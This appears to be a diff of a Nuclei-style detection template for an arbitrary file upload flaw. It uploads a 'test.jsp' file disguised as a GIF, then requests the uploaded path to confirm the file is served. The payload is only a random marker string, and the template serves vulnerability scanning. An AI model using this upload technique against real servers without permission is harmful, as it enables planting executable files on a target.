- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file